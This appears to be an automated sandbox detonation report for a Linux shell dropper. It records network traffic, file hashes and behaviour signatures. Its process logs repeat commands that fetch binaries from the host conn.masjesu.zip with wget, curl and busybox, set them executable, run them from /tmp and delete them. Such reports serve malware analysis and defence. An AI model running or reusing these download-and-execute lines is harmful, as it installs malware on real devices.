[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/chmod

[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a

[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/rm

[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/chmod

[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ

[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/rm

[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/chmod

[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo

[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/rm

[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/chmod

[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R

[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/rm

[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/chmod

[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5

[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/rm

[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/chmod

[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M

[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/rm

[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/chmod

[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm

[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/rm

[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/chmod

[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an

[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/rm

[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ

MD5 c3da85a3173a4ec9d42682016f6a69e2
SHA1 b644cacfbf06e841788ab8deb5e388ef7ddf982d
SHA256 77df749f6bbe85442500437f7e798f46b9635da344811ae3b4bf7d43048ee9bb
SHA512 ff3c45bb810169a269b1d0edcfc251c2b31e4acaec0acf1f8a561752b261fcba76ad0f5f5b298f64c50afa7ac9b99262b25af161451e83b14b202c8d33f2eaeb

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 01:27

Reported

2024-11-24 01:29

Platform

debian9-mipsel-20240418-en

Max time kernel

80s

Max time network

82s

Command Line

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 N/A
N/A /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M N/A
N/A /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm N/A
N/A /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an N/A
N/A /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ N/A
N/A /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh N/A
N/A /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC N/A
N/A /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 N/A
N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB N/A
N/A /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a N/A
N/A /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ N/A
N/A /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo N/A
N/A /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R N/A
N/A /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ N/A
N/A /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh N/A
N/A /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC N/A
N/A /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 N/A
N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB N/A
N/A /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a N/A
N/A /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ N/A
N/A /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo N/A
N/A /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R N/A
N/A /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 N/A
N/A /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M N/A
N/A /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm N/A
N/A /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /usr/bin/curl N/A
File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /usr/bin/curl N/A
File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /usr/bin/curl N/A
File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /usr/bin/curl N/A
File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /usr/bin/curl N/A
File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /usr/bin/curl N/A
File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /usr/bin/curl N/A
File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /usr/bin/curl N/A
File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /usr/bin/curl N/A
File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /usr/bin/curl N/A
File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /usr/bin/curl N/A
File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /usr/bin/curl N/A
File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /usr/bin/curl N/A
File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /usr/bin/curl N/A
File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /usr/bin/curl N/A
File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /usr/bin/curl N/A
File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /usr/bin/curl N/A
File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /usr/bin/curl N/A
File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /usr/bin/curl N/A
File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /usr/bin/curl N/A
File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /usr/bin/curl N/A
File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /usr/bin/curl N/A
File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /usr/bin/curl N/A
File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /usr/bin/curl N/A
File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /usr/bin/curl N/A
File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /usr/bin/curl N/A
File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /usr/bin/curl N/A
File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /usr/bin/curl N/A

Processes

/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/chmod

[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5

[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/rm

[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

